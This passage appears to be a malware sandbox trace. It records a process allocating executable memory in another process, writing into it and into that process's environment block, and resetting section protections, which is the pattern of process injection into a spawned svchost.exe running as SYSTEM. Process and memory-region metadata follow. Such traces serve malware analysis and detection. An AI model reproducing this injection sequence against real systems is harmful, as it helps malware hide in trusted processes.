NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.430] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.431] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.431] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2a8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.431] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.431] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.431] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.431] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.431] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.431] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.432] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.432] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.432] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.432] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.432] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.432] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.432] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2b0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.432] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.432] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.433] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.433] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.433] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.433] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.433] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.433] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.433] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.434] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.434] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.434] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.434] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2b8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.434] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.434] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.435] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.435] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.435] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.435] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.435] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.435] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.435] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.436] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.436] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.436] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.436] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2c0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.436] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.437] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.437] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.437] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.437] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.437] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.437] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.438] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.438] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.438] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.438] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.438] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.438] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2c8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.439] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.439] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.439] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.439] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.439] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.439] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.439] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.440] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.440] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.440] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.440] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.440] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.440] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2d0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.441] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.441] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.441] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.441] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.441] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.441] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.441] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.442] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.442] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.442] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.442] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.442] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.442] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2d8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.442] NtProtectVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e0c0*=0x140001000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x20, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140001000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0241.443] NtProtectVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e0c0*=0x14002a000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x2, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x14002a000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0241.443] NtProtectVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e0c0*=0x140033000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x4, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140033000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0241.443] NtProtectVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e0c0*=0x140034000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x2, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140034000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0241.443] NtProtectVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e0c0*=0x140037000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x2, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140037000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0241.443] NtProtectVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e0c0*=0x140038000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x2, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140038000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0241.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e038*=0x0, ZeroBits=0x0, RegionSize=0x28e100*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e038*=0x1470000, RegionSize=0x28e100*=0x1000) returned 0x0 [0241.443] NtQueryInformationProcess (in: ProcessHandle=0x12c, ProcessInformationClass=0x0, ProcessInformation=0x1470000, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1470000, ReturnLength=0x0) returned 0x0 [0241.443] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x7fffffdd010, Buffer=0x28e278*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e040 | out: Buffer=0x28e278*, NumberOfBytesWritten=0x28e040*=0x8) returned 0x0 [0241.443] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x7fffffdd018, Buffer=0x28e110, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28e048 | out: Buffer=0x28e110*, NumberOfBytesRead=0x28e048*=0x8) returned 0x0 [0241.443] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x77d72640, Buffer=0x28e158, NumberOfBytesToRead=0x30, NumberOfBytesRead=0x28e058 | out: Buffer=0x28e158*, NumberOfBytesRead=0x28e058*=0x30) returned 0x0 [0241.444] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2825d0, Buffer=0x28e188, NumberOfBytesToRead=0x88, NumberOfBytesRead=0x28e068 | out: Buffer=0x28e188*, NumberOfBytesRead=0x28e068*=0x88) returned 0x0 [0241.444] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x282600, Buffer=0x28e278*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e080 | out: Buffer=0x28e278*, NumberOfBytesWritten=0x28e080*=0x8) returned 0x0 [0241.444] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e000*=0x0, ZeroBits=0x0, RegionSize=0x28e008*=0x80, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e000*=0x20000, RegionSize=0x28e008*=0x1000) returned 0x0 [0241.444] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e070*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28e090 | out: Buffer=0x28e070*, NumberOfBytesWritten=0x28e090*=0x10) returned 0x0 [0241.444] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x2e2480*, NumberOfBytesToWrite=0x70, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x2e2480*, NumberOfBytesWritten=0x28dfd8*=0x70) returned 0x0 [0241.444] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x282618, Buffer=0x28e070*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28e0a0 | out: Buffer=0x28e070*, NumberOfBytesWritten=0x28e0a0*=0x10) returned 0x0 [0241.444] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28df88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dff8 | out: Buffer=0x28df88*, NumberOfBytesRead=0x28dff8*=0x48) returned 0x0 [0241.444] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df58*=0x0, ZeroBits=0x0, RegionSize=0x28df08*=0x10, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df58*=0xe0000, RegionSize=0x28df08*=0x1000) returned 0x0 [0241.444] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x28df78*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df60 | out: Buffer=0x28df78*, NumberOfBytesWritten=0x28df60*=0x10) returned 0x0 [0241.444] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28df88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28e008 | out: Buffer=0x28df88*, NumberOfBytesWritten=0x28e008*=0x48) returned 0x0 [0241.445] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.445] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.462] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28df88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28e010 | out: Buffer=0x28df88*, NumberOfBytesRead=0x28e010*=0x48) returned 0x0 [0241.462] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e130*=0x1470000, RegionSize=0x28e120, FreeType=0x8000) returned 0x0 [0241.462] NtClose (Handle=0x140) returned 0x0 [0241.462] NtClose (Handle=0x144) returned 0x0 [0241.462] CloseHandle (hObject=0x12c) returned 1 [0241.463] CloseHandle (hObject=0x120) returned 1 [0241.463] Sleep (dwMilliseconds=0x1f4) [0241.966] ExitProcess (uExitCode=0x0) Thread: id = 364 os_tid = 0x9c4 Process: id = "38" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3fc8b000" os_pid = "0x9b4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x534" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5252 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5253 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5254 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5255 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5256 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 5257 start_va = 0x77c40000 end_va = 0x77de8fff 